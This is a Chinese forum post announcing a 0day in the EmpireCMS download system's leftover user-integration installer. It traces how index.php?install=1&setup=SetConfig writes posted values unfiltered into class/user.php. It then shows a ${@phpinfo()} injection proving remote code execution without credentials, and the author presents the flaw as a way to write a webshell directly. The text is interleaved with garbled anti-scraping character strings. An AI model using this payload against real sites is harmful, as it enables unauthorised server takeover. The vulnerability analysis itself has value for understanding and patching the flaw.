帝国万能接口漏洞0day

admin · 发表于 2013-1-23 09:34:37

这是帝国的一套下载系统如图 ps(不需要任何账户和密码，直接写shell) 由于很多站是由于下载要整合discuz等等一些论坛.... 而帝国他又有一个万能接口，如图而这个接口很多人又不会删除，由此他带来了很大的安全隐患，导致直接getshell，下面分析代码当我们; `. u( T: [" c7 z% Z2 y( P' x' c
4 p* g& M$ E5 P  F

4 e$ D9 e8 N5 J9 ^/ r
这是帝国的一套下载系统如图
8 W+ d7 S5 F" \4 $ Jps(不需要任何账户和密码，直接写shell)

5 }6 m3 M$ j3 P: e
由于很多站是由于下载要整合discuz 等等一些论坛....
1 R0 g8 Z) V9 @- h$ B$ e

5 o- ?5 $ ^" S
而帝国他又有一个万能接口，如图

8 v- Y& z! n3 @* `! u3 r
, N8 t1 e/ O. U$ ]* T- T. n3 m  r& J5 ~
而这个接口很多人又不会删除，由此他带来了很大的安全隐患，导致直接getshell，下面分析代码
: c( s: j0 u' C$ G3 D9 T% q2 i, L7 n. W( u5 J8 v; v8 g& Y
当我们提交的时候，他地址是提交到index.php?install=1&setup=SetConfig
1. if($_GET['install']==1)
2. {
3. @include("../class/connect.php");
4. @include("../class/db_sql.php");
5. @include("../class/functions.php");
6. $link=db_connect();
7. $empire=new mysqlquery();
8. if($setup=="SetConfig")
9. {
10. SetUserCOMConfig($_POST);
11. }
12. elseif($setup=="alter")
13. {
14. InstallUserCOM();
15. }
16. elseif($setup=="update")
17. {
18. UpdateUserCOM();
19. }
20. else
21. {}
复制代码
他这里开始调用一个SetUserCOMConfig的函数了，我们继续跟踪& [; J6 O- ~9 a! ~) S

6 z2 ~  k) l; A/ C# p在data/fun.php中的15行7 d) i8 {$ Z8 j6 w+ t6 n
! E. s+ ?' ~- v0 N9 {1 k, y$ v, t
我们可以看到这个函数
1. function SetUserCOMConfig($add){
2. $filetext=ReadFiletext('data/user.php');
3. if(empty($filetext))
4. {
5. InstallShowMsg('文件 /update/data/user.php 丢失,安装不成功.');
6. }
7. $vr=explode(",",ReturnRepUserVar());
8. $count=count($vr);
9. for($i=0;$i<$count;$i++)
10. {
11. $filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);
12. }
13. //写入配置文件
14. $fp=@fopen("../class/user.php","w");
15. if(!$fp)
16. {
" h2 q! g# w3 Y: O% |
17. InstallShowMsg(' /class/user.php 文件权限没有设为0777，安装不成功.');
18. }
19. @fputs($fp,$filetext);
20. @fclose($fp);
复制代码
.....//省略若干
, A1 L. y7 u: a3 m) p- a" K
+ A1 G" g* ^! l/ Z这里的他将$filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);
5 B+ }. N) X3 m: |% S& g5 d$ ]6 x( }; N4 a* ^2 N
他将传进来的变量进行了切割，然后赋给了$filetext
  T! S: t* L* M3 ^6 r; f
1 {, d+ n# b# h然后看下面
1. //写入配置文件
2. $fp=@fopen("../class/user.php","w");
3. if(!$fp)
4. {
5. InstallShowMsg(' /class/user.php 文件权限没有设为0777，安装不成功.');
6. }
7. @fputs($fp,$filetext);
复制代码
打开了一个class/user.php文件，然后将$filetext写入了
9 i. V4 K6 E+ X, x& u- t2 P2 C2 o) ?- X% ]9 d& \  B5 h8 M8 |
我们看看写入的结果，随便填一个

& H0 I3 b- m' L- {8 f6 z: W2 v8 }% n8 w5 {0 }
* b: j7 X3 \: M/ O1 n0 I2 \
! T6 O& J- `$ N/ ~

# u' n# V9 W, e! G! h; B
2 C. |( j" D5 s) {" j6 y- _& H. |
% Z+ \: ^2 w# D# m7 h- ]' g' ~7 `' G3 d6 |( H. v! D: T0 u

, R) K0 o, E% s) g; h5 C
; ~6 w6 i% O) A/ n$ W- r& A
! ?* E, o: L: d& ?
' J- ]- ^0 m! E6 X0 E) E
& c4 n+ U3 v) r% E  r. {, ^( B  L. Z* r1 m

  f7 a" g* M9 M. {; m1 _0 O2 z
0 w8 u1 J8 ?- d* g! f- [" H, I4 E/ g4 B/ x- \
. @7 F' _' R/ M$ c9 f5 d
- ?" O, _: }# \9 \0 n
0 b& M  h- Z0 i) }

$ @+ k7 e1 C; n1 `4 [& u
5 ]3 V; M3 B' U0 ^2 f1 `所以我们淫荡点，写个${@phpinfo()}试试

4 p. s; U2 q  x2 F6 o
然后访问以下class/user.php这个文件
5 G  S/ [4 c' c8 i4 L9 U2 ^9 w日了吧
( ~1 A  |7 w8 d% e) @2 R
$ m7 p, r* T  y! U8 ?5 x* w
4 N0 z) D3 v5 {/ `2 X6 u4 S$ I0 B

" I5 d9 x% l% v  v: b
* ^# e% z$ w, p; j' _

		自动登录	找回密码
密码			立即注册

帝国万能接口漏洞0day

本帖子中包含更多资源

浏览过的版块